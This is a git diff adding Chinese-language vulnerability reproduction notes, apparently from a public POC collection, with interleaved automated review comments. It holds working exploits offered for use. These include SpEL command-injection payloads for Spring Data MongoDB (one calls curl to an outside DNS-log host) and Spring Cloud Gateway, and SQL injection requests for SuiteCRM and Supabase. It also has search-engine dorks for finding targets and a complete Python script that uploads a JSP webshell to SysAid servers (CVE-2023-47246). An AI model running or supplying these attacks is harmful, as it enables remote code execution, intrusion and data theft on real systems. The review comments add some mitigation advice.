
@@ -0,0 +1,42 @@ +# Spring Data MongoDB SpEL表达式注入漏洞 + +# 一、漏洞描述 +Spring官方发布了关于Spring Data MongoDB SpEL表达式注入漏洞的修复信息,当使用@Query或@Aggregation注解进行查询时,若通过SpEL表达式中形如“?0”的占位符来进行参数赋值,同时应用程序未对用户输入进行过滤处理,则可能受到SpEL表达式注入的影响,成功利用该漏洞的攻击者可在目标服务器上执行代码。 + +# 二、影响版本 +Spring Data MongoDB == 3.4.0 + +3.3.0 <= Spring Data MongoDB <= 3.3.4 + +旧的、不受支持的版本也会受到影响 + +# 三、资产测绘 +```plain + +``` + +![1730011780302-72a7fb38-c2c2-4f89-bf47-cdd8f776e224.png](./img/ZExlZ6n1pcklAxos/1730011780302-72a7fb38-c2c2-4f89-bf47-cdd8f776e224-536417.png) + +# 三、漏洞复现 +```plain +#更新 +/name=T(java.lang.String).forName('java.lang.Runtime').getRuntime().exec('apt-get update') + +#下载curl +/name=T(java.lang.String).forName('java.lang.Runtime').getRuntime().exec('apt-get install -y curl') +``` + +执行curl dnslog + +```plain +/?name=T(java.lang.String).forName(%27java.lang.Runtime%27).getRuntime().exec(%27curl%20hrnceuwsrl.iyhc.eu.org%27) +``` + +![1730012025414-b5771bdf-4af2-42ab-873f-54933df0e54b.png](./img/ZExlZ6n1pcklAxos/1730012025414-b5771bdf-4af2-42ab-873f-54933df0e54b-779912.png) + + + + + +> 更新: 2024-11-27 10:04:43 +> 原文: <https://www.yuque.com/xiaokp7/ocvun2/dcbhf1pnmuar814k> \ No newline at end of file diff --git a/SpringEureka存在actuator未授权漏洞.md b/SpringEureka存在actuator未授权漏洞.md new file mode 100644 index 0000000..d3e5627 --- /dev/null +++ b/SpringEureka存在actuator未授权漏洞.md @@ -0,0 +1,19 @@ +# SpringEureka存在actuator未授权漏洞 + +# 一、漏洞描述 +SpringEureka存在actuator未授权漏洞 + +# 二、影响版本 +![1724658132224-af3f921b-3ac2-4c1f-bb1a-75222ada73e7.png](./img/dARwOcEzLZ2YhwMy/1724658132224-af3f921b-3ac2-4c1f-bb1a-75222ada73e7-850357.png) + +# 三、漏洞复现 +```plain +/actuator/env +``` + +![1724658154695-2ae6085c-ad26-4025-b0b1-4c1a1adc42ff.png](./img/dARwOcEzLZ2YhwMy/1724658154695-2ae6085c-ad26-4025-b0b1-4c1a1adc42ff-511519.png) + + + +> 更新: 2024-09-05 23:24:41 +> 原文: <https://www.yuque.com/xiaokp7/ocvun2/vxhc3yrf6eae9gtd> \ No newline at end of file 
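Review bot: In SpringBladetenant-list存在SQL注入漏洞.md the description only restates the title and 影响版本 lists `SpringBlade` with no version range or fixed release, so a reader cannot tell whether a deployment is affected; add the affected and fixed versions plus the advisory reference. Two smaller points: the description has a stray space in `SQL注 入`, and the 资产测绘 bullet carries raw `<font style=...>` markup from the Yuque export that should be reduced to `body="https://bladex.vip"`. It is also worth documenting why the result shown as `e10adc3949ba59abbe56e057f20f883` is 31 characters long: MySQL caps the updatexml XPATH error text at 32 characters, so the leading `~` plus the first 31 hex digits of md5(123456) is the expected response, not a failed or truncated check.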
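Review bot: SpringBladeuser-list存在敏感信息泄露漏洞.md never says what `/api/blade-user/user-list` returns or why the request succeeds; the only evidence is a `Blade-Auth: bearer ...` JWT, and it is the same token pasted into the three other SpringBlade files in this commit. State that the token is minted with the fixed signing secret described in SpringBlade存在硬编码密钥漏洞.md (otherwise the request reads as an ordinary authenticated listing), cross-reference that file, and list which fields leak so the severity is traceable. The request block also has an empty `Host:` header and is fenced as `java` although it is an HTTP request; `http` would be the accurate tag.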
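Review bot: SpringBladeusual-list存在SQL注入漏洞.md has the same gaps as the tenant-list file: no version range, a `java` fence around an HTTP request, `<font>` residue in the asset-mapping bullet, and an empty `Host:`. The notable detail of this finding is that `updatexml(1,concat(0x7e,user(),0x7e),1)=1` is supplied as a query-string key rather than a value, meaning the parameter name reaches the SQL builder; say so explicitly, because that is what a code fix or a request-filtering rule has to address.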
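Review bot: SpringBlade存在硬编码密钥漏洞.md is titled as a hard-coded key finding, but the hunk never identifies the key, where it is configured, or how the `Blade-Auth` token was produced; the PoC is a GET to `/api/blade-user/info` with a pre-built JWT, so the reader cannot distinguish this from a leaked session token. Document where the default signing secret lives in the framework configuration (the secret itself need not be printed), that the pasted token is HS256-signed with it (`eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9` decodes to `{"alg":"HS256","typ":"JWT"}`), and the remediation: set a unique per-deployment signing key and invalidate tokens issued under the default.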
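Review bot: In SpringBootjolokiaRealmJNDI远程代码执行漏洞.md the reproduction steps are misnumbered (two steps labelled `2.` and two labelled `4.`), step 4 misspells `exploit` as `expliot`, and the section headings mix `# 二、` with `## 二、`; renumber the steps and use one heading level. More substantively, the write-up depends on two external attachments (a jar and `exploit.py` hosted on yuque.com) with no checksum or upstream source, and it gives no mitigation: add that the fix is to stop exposing the Jolokia actuator endpoint (for Spring Boot 2.x, leave it out of `management.endpoints.web.exposure.include` and put the actuator behind authentication), which the 影响版本 note about the 1.5 default change already implies.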
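Review bot: SpringDataMongoDBSpEL表达式注入漏洞.md has two sections numbered 三、, an empty 资产测绘 code block, and no advisory identifier even though the text says Spring published a fix; add the CVE reference and the fixed versions. The first reproduction block runs `apt-get update` and `apt-get install -y curl` through the injected expression, which changes the target host's package state; the document should say so, since that is a side effect beyond demonstrating the flaw. The third request hard-codes a specific DNS-log host (`hrnceuwsrl.iyhc.eu.org`); replace it with a placeholder such as `<dnslog-domain>`.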
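Review bot: SpringEureka存在actuator未授权漏洞.md states the finding only as its own title, the affected-version section is an image, and the PoC is the bare path `/actuator/env`. Spell out what is exposed (the env endpoint returns configuration properties, which can include credentials whose key names are not caught by the built-in sanitization) and give the mitigation the title implies: restrict `management.endpoints.web.exposure.include` and require authentication on `/actuator/**`. The affected component is Spring Boot Actuator rather than Eureka itself, so the title is misleading.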
diff --git a/Springbootgateway存在命令执行漏洞.md b/Springbootgateway存在命令执行漏洞.md new file mode 100644 index 0000000..4d8597a --- /dev/null +++ b/Springbootgateway存在命令执行漏洞.md 
@@ -0,0 +1,89 @@ +# Spring boot gateway存在命令执行漏洞 + +# 一、漏洞描述 +Spring boot gateway存在命令执行漏洞 + +# 二、影响版本 +Spring boot actuator未授权 + +# 三、资产测绘 +```plain +/actuator/gateway/ 接口存在 +``` + +![1730259600146-25661149-dd5e-4032-9a0c-1c1c822d05be.png](./img/N0O-b9s0Otwvz0JD/1730259600146-25661149-dd5e-4032-9a0c-1c1c822d05be-729423.png) + +# 三、漏洞复现 +1. <font style="color:rgba(0, 0, 0, 0.9);">构造poc1创建hacker文件:</font> + +```plain +POST /actuator/gateway/routes/jeecg-demo HTTP/1.1 +Host: +Accept-Encoding: gzip, deflate +Accept: */* +Accept-Language: en +User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/97.0.4692.71 Safari/537.36 +Connection: close +Content-Type: application/json +Content-Length: 333 + +{ + "id": "/jeecg-demo", + "filters": [{ + "name": "AddResponseHeader", + "args": { + "name": "Result", + "value": "#{new String(T(org.springframework.util.StreamUtils).copyToByteArray(T(java.lang.Runtime).getRuntime().exec(new String[]{\"whoami\"}).getInputStream()))}" + } + }], + "uri": "http://example.com" +} + +``` + +![1730259826668-97743867-3d03-439c-9fd3-431b8ae57efd.png](./img/N0O-b9s0Otwvz0JD/1730259826668-97743867-3d03-439c-9fd3-431b8ae57efd-354366.png) + +2、刷新路由 + +```plain +POST /actuator/gateway/refresh HTTP/1.1 +Host: +User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:127.0) Gecko/20100101 Firefox/127.0 +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8 +Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2 +Accept-Encoding: gzip, deflate, br +Connection: close +Cookie: __51uvsct__JuHMLCp1r3cB6ggB=1; __51vcke__JuHMLCp1r3cB6ggB=8bfe73d5-e527-5232-9cbe-1f2983c556d9; __51vuft__JuHMLCp1r3cB6ggB=1681223932313 +Upgrade-Insecure-Requests: 1 +Sec-Fetch-Dest: document +Sec-Fetch-Mode: navigate +Sec-Fetch-Site: none +Sec-Fetch-User: ?1 +Priority: u=1 +Content-Type: application/x-www-form-urlencoded +Content-Length: 0 + +``` + 
+![1730259859862-7d54ce26-aedd-4fe3-be7f-158cb5062a3e.png](./img/N0O-b9s0Otwvz0JD/1730259859862-7d54ce26-aedd-4fe3-be7f-158cb5062a3e-429367.png) + +3、查看回显 + +```plain +GET /actuator/gateway/routes/jeecg-demo HTTP/1.1 +Host: +Accept-Encoding: gzip, deflate +Accept: */* +Accept-Language: en +User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/97.0.4692.71 Safari/537.36 +Connection: close +Content-Type: application/x-www-form-urlencoded +Content-Length: 0 +``` + +![1730259885785-61015288-0875-478c-b1c5-3b7b5f2c405b.png](./img/N0O-b9s0Otwvz0JD/1730259885785-61015288-0875-478c-b1c5-3b7b5f2c405b-981370.png) + + + +> 更新: 2024-11-27 10:04:43 +> 原文: <https://www.yuque.com/xiaokp7/ocvun2/gl2g116gzest4e6t> \ No newline at end of file diff --git a/SuiteCRMresponseEntryPoint存在SQL注入漏洞.md b/SuiteCRMresponseEntryPoint存在SQL注入漏洞.md new file mode 100644 index 0000000..e1766d8 --- /dev/null +++ b/SuiteCRMresponseEntryPoint存在SQL注入漏洞.md @@ -0,0 +1,30 @@ +# SuiteCRM responseEntryPoint存在SQL注入漏洞 + +# 一、漏洞简介 +SuiteCRM存在SQL注入漏洞,未经身份验证的远程攻击者可以通过该漏洞拼接执行SQL注入语句,从而获取数据库敏感信息。 + +# 二、影响版本 ++ SuiteCRM + +# 三、资产测绘 +```plain +title="SuiteCRM" +``` + +![1721616680565-4373451c-6a4b-4181-b8cc-42171ab43ac1.png](./img/xYNk3xzrkGpeK4r-/1721616680565-4373451c-6a4b-4181-b8cc-42171ab43ac1-982759.png) + +# 四、漏洞复现 +```plain +GET /index.php?entryPoint=responseEntryPoint&event=1&delegate=a<"+UNION+SELECT+SLEEP(5);--+-&type=c&response=accept HTTP/1.1 +Host: +User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15 +Accept-Encoding: gzip +Connection: close +``` + +![1721616810604-b8692135-f0dd-4e90-bc63-5a59fa4a44c8.png](./img/xYNk3xzrkGpeK4r-/1721616810604-b8692135-f0dd-4e90-bc63-5a59fa4a44c8-002834.png) + + + +> 更新: 2024-08-12 17:16:00 +> 原文: <https://www.yuque.com/xiaokp7/ocvun2/scs5n834l406n097> \ No newline at end of file 
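Review bot: Springbootgateway存在命令执行漏洞.md describes step 1 as `构造poc1创建hacker文件`, but the request body executes `whoami` through the `AddResponseHeader` filter's SpEL expression and creates no file; align the step text with what the PoC does. The 影响版本 section holds a precondition (`Spring boot actuator未授权`) instead of a version, and no advisory identifier is given: add the Spring Cloud Gateway version range and the CVE. The refresh request also carries a pasted browser session (`Cookie: __51uvsct__...`, the `Sec-Fetch-*` headers, `Priority: u=1`) that has nothing to do with the PoC and should be stripped. Mitigation to document: the gateway actuator endpoint (`management.endpoint.gateway.enabled`) should be disabled or placed behind authentication, since route creation through it is administrative by design.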
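Review bot: SuiteCRMresponseEntryPoint存在SQL注入漏洞.md uses a time-based payload (`UNION SELECT SLEEP(5)`) but never states the expected observable, and the screenshot is the only evidence; note that a vulnerable host answers after roughly a five-second delay whereas an unaffected one answers immediately, and list the affected SuiteCRM versions and the fixed release instead of only `SuiteCRM`. The description claims no authentication is needed; back that up by pointing out that the request carries no cookie or token, so the claim is verifiable from the PoC itself.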
diff --git a/Supabasequery存在SQL注入漏洞.md b/Supabasequery存在SQL注入漏洞.md new file mode 100644 index 0000000..9c39904 --- /dev/null +++ b/Supabasequery存在SQL注入漏洞.md @@ -0,0 +1,45 @@ +# Supabase query存在SQL注入漏洞 + +# 一、漏洞简介 +Supabase是一个开源的Firebase替代品,提供了一系列的后端功能,让你可以更快地构建产品。它使用PostgreSQL作为数据库,支持SQL和RESTful API访问。此外,Supabase提供了完整的认证系统,支持邮箱、手机号、第三方服务等多种登录方式。Supabase 存在SQL注入漏洞,攻击者可通过该漏洞获取数据库敏感信息甚至可获得服务器权限。 + +# 二、影响版本 ++ Supabase + +# 三、资产测绘 ++ hunter`app.name="Supabase"` ++ 特征 + +![1701170235545-bdaa2d9d-5918-4200-b9e7-7b89025dcb08.png](./img/xJRj9JN6yjABftPr/1701170235545-bdaa2d9d-5918-4200-b9e7-7b89025dcb08-568605.png) + +# 四、漏洞复现 +```plain +POST /api/pg-meta/default/query HTTP/1.1 +Host: xx.xx.xx.xx +Content-Type: application/json +User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15 +Content-Length: 103 + +{"query":"(SELECT CONCAT(CONCAT('qjpzq',(CASE WHEN (2016=2016) THEN '1' ELSE '0' END)),'qkbbq'))"} +``` + +![1701170299913-9a46ea32-48ba-4adb-83f8-1e8e52b81aab.png](./img/xJRj9JN6yjABftPr/1701170299913-9a46ea32-48ba-4adb-83f8-1e8e52b81aab-284336.png) + +sqlmap + +```plain +POST /api/pg-meta/default/query HTTP/1.1 +Host: xx.xx.xx.xx +Content-Type: application/json +User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15 +Content-Length: 103 + +{"query":""} +``` + +![1701170323505-a6156120-f091-409e-aeb7-4d96a390a4e4.png](./img/xJRj9JN6yjABftPr/1701170323505-a6156120-f091-409e-aeb7-4d96a390a4e4-551880.png) + + + +> 更新: 2024-02-29 23:55:44 +> 原文: <https://www.yuque.com/xiaokp7/ocvun2/gsa0ghyt670h5o3q> \ No newline at end of file diff --git a/SysAid远程命令执行漏洞(CVE-2023-47246).md b/SysAid远程命令执行漏洞(CVE-2023-47246).md new file mode 100644 index 0000000..7374ce5 --- /dev/null +++ b/SysAid远程命令执行漏洞(CVE-2023-47246).md 
@@ -0,0 +1,224 @@ +## SysAid远程命令执行漏洞(CVE-2023-47246) + +## 漏洞影响版本 +SysAid Server<23.3.36 + +## 网络空间搜索 +``` +fofa:body="sysaid-logo-dark-green.png" || title="SysAid Help Desk Software" || body="Help Desk software <a href=\"http://www.sysaid.com\">by SysAid</a>" +shodan:http.favicon.hash:1540720428 +zoomeye:app:"SysAid On-Prem Software" +hunter.how:favicon_hash="5f30870725d650d7377a134c74f41cfd" +``` + +## poc +``` +POST /userentry?accountId=/../../../tomcat/webapps/UIHM3/&symbolName=test&base64UserName=YWRtaW4= HTTP/1.1 +Host: 127.0.0.1 +User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:47.0) Gecko/20100101 Firefox/47.0 +Accept-Encoding: gzip, deflate +Accept: */* +Connection: close +Content-Type: application/x-www-form-urlencoded +Content-Length: 87 + +xœðffa``à`H­*ç©«¿Áä± +``` +![fb5ab4bdde18a3c8f92a3c0d5d2b23c9](https://github.com/wy876/POC/assets/139549762/f0e899f9-0d0f-4bda-9b1b-8d6f3151d290) + +![3dad5ed7f4a321562ad6c74ee9a9edf1](https://github.com/wy876/POC/assets/139549762/1b81f98e-2599-4622-8c24-c2543a543544) + +## Exp脚本 + +```python +import argparse +import binascii +import random +import time +import zipfile +import zlib +import urllib3 +import requests + +urllib3.disable_warnings() + +def compressFile(shellFile, warFile): + try: + with zipfile.ZipFile(warFile, 'w', zipfile.ZIP_DEFLATED) as zipf: + zipf.write(shellFile) + zipf.close() + return True + except: + return False + + +def getHexData(warFile): + with open(warFile, 'rb') as warfile: + data = warfile.read() + warfile.close() + compressed_data = zlib.compress(data) + hex_data = binascii.hexlify(compressed_data).decode() + return hex_data + + +def generateRandomDirectoryName(num): + charset = 'ABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789' + return ''.join(random.choice(charset) for _ in range(num)) + + +def get_random_agent(): + agent_list = [ + 'Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36', + 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 
(KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36', + 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36', + 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36', + 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_6) AppleWebKit/601.7.7 (KHTML, like Gecko) Version/9.1.2 Safari/601.7.7', + 'Mozilla/5.0 (Windows NT 10.0; WOW64; rv:48.0) Gecko/20100101 Firefox/48.0', + 'Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36', + 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:48.0) Gecko/20100101 Firefox/48.0', + 'Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36', + 'Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko', + 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36', + 'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36', + 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36', + 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:47.0) Gecko/20100101 Firefox/47.0', + 'Mozilla/5.0 (Windows NT 10.0; WOW64; rv:47.0) Gecko/20100101 Firefox/47.0', + 'Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36', + 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:48.0) Gecko/20100101 Firefox/48.0', + 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10.11; rv:48.0) Gecko/20100101 Firefox/48.0', + 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/46.0.2486.0 Safari/537.36 Edge/13.10586', + 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10.11; rv:47.0) Gecko/20100101 Firefox/47.0', + 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_5) AppleWebKit/601.6.17 (KHTML, like 
Gecko) Version/9.1.1 Safari/601.6.17', + 'Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36', + 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36', + 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_6) AppleWebKit/601.7.8 (KHTML, like Gecko) Version/9.1.3 Safari/601.7.8', + 'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Ubuntu Chromium/51.0.2704.79 Chrome/51.0.2704.79 Safari/537.36', + 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_5) AppleWebKit/601.7.7 (KHTML, like Gecko) Version/9.1.2 Safari/601.7.7', + 'Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko', + 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36', + 'Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36', + 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36', + 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36', + 'Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0', + 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36', + 'Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36', + 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:48.0) Gecko/20100101 Firefox/48.0', + 'Mozilla/5.0 (Windows NT 6.3; WOW64; rv:48.0) Gecko/20100101 Firefox/48.0', + 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:47.0) Gecko/20100101 Firefox/47.0', + 'Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko', + 'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.82 Safari/537.36', + 'Mozilla/5.0 (X11; Linux x86_64; 
rv:48.0) Gecko/20100101 Firefox/48.0', + 'Mozilla/5.0 (Windows NT 6.1; rv:48.0) Gecko/20100101 Firefox/48.0', + 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12) AppleWebKit/602.1.50 (KHTML, like Gecko) Version/10.0 Safari/602.1.50', + 'Mozilla/5.0 (Windows NT 6.3; WOW64; rv:47.0) Gecko/20100101 Firefox/47.0', + 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36', + 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:48.0) Gecko/20100101 Firefox/48.0', + 'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.106 Safari/537.36', + 'Mozilla/5.0 (Windows NT 6.1; rv:47.0) Gecko/20100101 Firefox/47.0', + 'Mozilla/5.0 (iPad; CPU OS 9_3_4 like Mac OS X) AppleWebKit/601.1.46 (KHTML, like Gecko) Version/9.0 Mobile/13G35 Safari/601.1', + 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_4) AppleWebKit/601.5.17 (KHTML, like Gecko) Version/9.1 Safari/601.5.17', + 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36', + 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2785.89 Safari/537.36', + 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2785.89 Safari/537.36', + 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:45.0) Gecko/20100101 Firefox/45.0', + 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36', + 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.79 Safari/537.36 Edge/14.14393', + 'Mozilla/5.0 (Windows NT 6.3; WOW64; Trident/7.0; rv:11.0) like Gecko', + 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_5) AppleWebKit/601.7.7 (KHTML, like Gecko) Version/9.1.2 Safari/537.86.7', + 'Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.82 Safari/537.36 OPR/39.0.2256.48', + 
'Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0; Trident/5.0)', + 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36', + 'Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:48.0) Gecko/20100101 Firefox/48.0', + 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.82 Safari/537.36 OPR/39.0.2256.48', + 'Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36', + 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:47.0) Gecko/20100101 Firefox/47.0', + 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.82 Safari/537.36', + 'Mozilla/5.0 (Windows NT 5.1; rv:48.0) Gecko/20100101 Firefox/48.0', + 'Mozilla/5.0 (X11; CrOS x86_64 8350.68.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36', + 'Mozilla/5.0 (X11; Fedora; Linux x86_64; rv:48.0) Gecko/20100101 Firefox/48.0', + 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.106 Safari/537.36', + 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.82 Safari/537.36', + 'Mozilla/5.0 (iPhone; CPU iPhone OS 9_3_4 like Mac OS X) AppleWebKit/601.1 (KHTML, like Gecko) CriOS/52.0.2743.84 Mobile/13G35 Safari/601.1.46', + 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36', + 'Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; Touch; rv:11.0) like Gecko', + 'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2785.89 Safari/537.36' + ] + return agent_list[random.randint(0, len(agent_list) - 1)] + + +def shellUpload(url, proxy, directoryName, shellFile): + userEntryUrl = f"{url}/userentry?accountId=/../../../tomcat/webapps/{directoryName}/&symbolName=test&base64UserName=YWRtaW4=" + headers = { + 
"Content-Type": "application/x-www-form-urlencoded", + "User-Agent": get_random_agent() + } + shellFileName = shellFile.split(".")[0] + warFile = f"{shellFileName}.war" + if compressFile(shellFile, warFile): + shellHex = getHexData(warFile=warFile) + data = binascii.unhexlify(shellHex) + resp = requests.post(url=userEntryUrl, headers=headers, data=data, proxies=proxy, verify=False) + print("\033[92m[+] Shell file compressed successfully!\033[0m") + return resp + else: + print("\033[91m[x] Shell file compression failed.\033[0m") + exit(0) + + +def shellTest(url, proxy, directoryName, shellFile): + userEntryUrl = f"{url}/{directoryName}/{shellFile}" + headers = { + "User-Agent": get_random_agent() + } + resp = requests.get(url=userEntryUrl, headers=headers, timeout=15, proxies=proxy, verify=False) + return resp, userEntryUrl + +def exploit(url, proxy, shellFile): + print(f"\033[94m[*] start to attack: {url}\033[0m") + directoryName = generateRandomDirectoryName(5) + userentryResp = shellUpload(url, proxy, directoryName, shellFile) + print(f"\033[94m[*] Wait 9 seconds...\033[0m") + time.sleep(9) + cveTestResp, userEntryUrl = shellTest(url, proxy, directoryName, shellFile) + if userentryResp.status_code == 200 and cveTestResp.status_code == 200: + print(f"\033[92m[+] The website [{url}] has vulnerability CVE-2023-47246! 
Shell path: {userEntryUrl}\033[0m") + else: + print(f"\033[91m[x] The website [{url}] has no vulnerability CVE-2023-47246.\033[0m") + + +if __name__ == "__main__": + banner = """ + ______ _______ ____ ___ ____ _____ _ _ _____ ____ _ _ __ + / ___\ \ / / ____| |___ \ / _ \___ \|___ / | || |___ |___ \| || | / /_ +| | \ \ / /| _| _____ __) | | | |__) | |_ \ _____| || |_ / / __) | || |_| '_ \ +| |___ \ V / | |__|_____/ __/| |_| / __/ ___) |_____|__ _/ / / __/|__ _| (_) | + \____| \_/ |_____| |_____|\___/_____|____/ |_|/_/ |_____| |_| \___/ + Author: W01fh4cker + Blog: https://w01fh4cker.github.io + """ + print(banner) + parser = argparse.ArgumentParser(description="SysAid Server remote code execution vulnerability CVE-2023-47246 Written By W01fh4cker", + add_help="eg: python CVE-2023-47246-RCE.py -u https://192.168.149.150:8443") + parser.add_argument("-u", "--url", help="target URL") + parser.add_argument("-p", "--proxy", help="proxy, eg: http://127.0.0.1:7890") + parser.add_argument("-f", "--file", help="shell file, eg: shell.jsp") + args = parser.parse_args() + if args.url.endswith("/"): + url = args.url[:-1] + else: + url = args.url + if args.proxy: + proxy = { + 'http': args.proxy, + 'https': args.proxy + } + else: + proxy = {} + exploit(url, proxy, args.file) + +``` + +## 漏洞脚本来源 +``` +https://github.com/W01fh4cker/CVE-2023-47246-EXP +``` diff --git a/TBKDVR硬盘录像机device存在远程代码执行漏洞(CVE-2024-3721).md b/TBKDVR硬盘录像机device存在远程代码执行漏洞(CVE-2024-3721).md new file mode 100644 index 0000000..8d06704 --- /dev/null +++ b/TBKDVR硬盘录像机device存在远程代码执行漏洞(CVE-2024-3721).md 
